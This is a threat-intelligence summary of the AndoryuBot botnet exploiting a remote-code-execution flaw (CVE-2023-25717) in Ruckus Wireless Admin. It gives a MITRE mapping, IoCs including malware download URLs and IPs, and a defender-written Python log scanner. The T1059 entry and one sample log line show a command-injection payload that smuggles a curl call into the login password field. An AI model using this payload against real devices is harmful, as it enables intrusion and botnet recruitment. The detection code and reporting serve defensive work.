A critical RCE vulnerability in Ruckus Wireless Admin (CVE-2023-25717) is being actively exploited, with AndoryuBot deployed to weaponize the flaw for large-scale DDoS campaigns. Cyble CGSI and Fortinet report widespread exposure of Ruckus Admin panels and a growing threat ecosystem around AndoryuBot, which is sold on Telegram on a subscription basis. #CVE-2023-25717 #AndoryuBot #RuckusVulnerability
Keypoints
- CVE-2023-25717 is a critical Remote Code Execution vulnerability in Ruckus Wireless Admin that can be triggered via specially crafted HTTP requests.
- Active exploitation has been observed, with AndoryuBot deployed by threat actors targeting vulnerable Ruckus assets.
- Public PoC availability and Fortinet/CISA alerts indicate increasing opportunistic use and known exploitation in the wild.
- Approximately 52,000 Ruckus Wireless Admin panels are exposed on the internet, with geographic distribution analyzed by researchers.
- AndoryuBot is a subscription-based botnet malware sold on Telegram used to orchestrate large-scale DDoS attacks.
- IoCs include malicious URLs, IP addresses, and binary hashes associated with the AndoryuBot variant.
MITRE Techniques
- [T1059] Command and Scripting Interpreter - Used in the login attempt payload, which embeds a curl invocation inside a form parameter: "/forms/doLogin?login_username=admin&password=password$(curl substring)"
- [T1095] Non-Application Layer Protocol - Used to generate the DDoS traffic itself; the report describes AndoryuBot orchestrating "large-scale DDoS attacks, which can overwhelm targeted servers and infrastructure by flooding them with a massive volume of traffic."
- [T1140] Deobfuscate/Decode Files or Information - Listed in the article's MITRE mapping; covers the decoding of payloads during deployment as part of defense evasion.
- [T1480] Execution Guardrails - Listed in the article's ATT&CK mapping; refers to conditions or constraints that gate when the payload executes.
- [T1036] Masquerading - Implicitly reflected in the apparent legitimacy of the exposed Ruckus Admin Panel interfaces that are used to gain access.
- [T1055] Process Injection - Conceptually tied to the execution of injected processes when botnet payloads and commands are deployed.
Indicators of Compromise
- [URL] Malicious URL - hxxp://47.87.154.192/Andoryu.m68k, hxxp://47.87.154.192/Andoryu.arm7
- [IP] Malicious IP - 47.87.154.192, 163.123.142.146
- [Hash] MD5/SHA1/SHA256 - d2ad2d8d1b7dac89f2fb977c6b2c36a9, 86d630159a13b4a594e3eae23ccbda891a67f696, c4925a91ed853920d8acee79bf0bb9342da4dabc0a2970823027f39ede399bce
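As an added defender-side example (not code from Cyble or Fortinet), the following scanner ties the T1059 login payload pattern above to the IP indicators listed here: it walks combined-format web access log lines, flags /forms/doLogin requests whose login parameters contain shell command-substitution or chaining characters, and flags any request from a listed IP. The log lines are constructed samples; the field and path names come from the payload quoted in the summary.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# IP indicators taken from the summary above.
IOC_IPS = {"47.87.154.192", "163.123.142.146"}

# Shell metacharacters that never belong in a username or password field.
SHELL_INJECTION = re.compile(r"\$\(|`|;|\|")

# Combined/common access-log format: src ident user [ts] "METHOD target proto" status ...
ACCESS_LOG = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

def inspect_line(line):
    """Return the alert reasons for one access-log line (empty list if nothing matched)."""
    m = ACCESS_LOG.match(line)
    if not m:
        return []
    reasons = []
    parts = urlsplit(m.group("target"))
    if parts.path.endswith("/forms/doLogin"):
        params = parse_qs(parts.query, keep_blank_values=True)
        for name in ("login_username", "password"):
            for value in params.get(name, []):
                decoded = unquote(value)  # parse_qs decoded once; unwrap a second layer if present
                if SHELL_INJECTION.search(decoded):
                    reasons.append(f"shell metacharacters in {name}: {decoded!r}")
                if any(ip in decoded for ip in IOC_IPS):
                    reasons.append(f"known AndoryuBot IoC referenced in {name}")
    if m.group("src") in IOC_IPS:
        reasons.append(f"request from known AndoryuBot IP {m.group('src')}")
    return reasons

def scan(lines):
    """Map line index -> reasons for every line that raised at least one alert."""
    hits = {}
    for i, line in enumerate(lines):
        reasons = inspect_line(line)
        if reasons:
            hits[i] = reasons
    return hits

SAMPLE_LOG = [  # constructed sample lines, not real traffic
    '10.0.0.5 - - [17/May/2023:10:00:01 +0000] "GET /forms/doLogin?login_username=admin&password=Sup3rSecret HTTP/1.1" 200 512',
    '198.51.100.7 - - [17/May/2023:10:00:02 +0000] "GET /forms/doLogin?login_username=admin&password=password%24%28curl%2047.87.154.192%29 HTTP/1.1" 200 512',
    '163.123.142.146 - - [17/May/2023:10:00:03 +0000] "GET /admin/ HTTP/1.1" 200 128',
]

if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_LOG).items():
        print(f"line {idx}: " + "; ".join(reasons))
```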
Read more: https://blog.cyble.com/2023/05/17/andoryubots-ddos-rampage/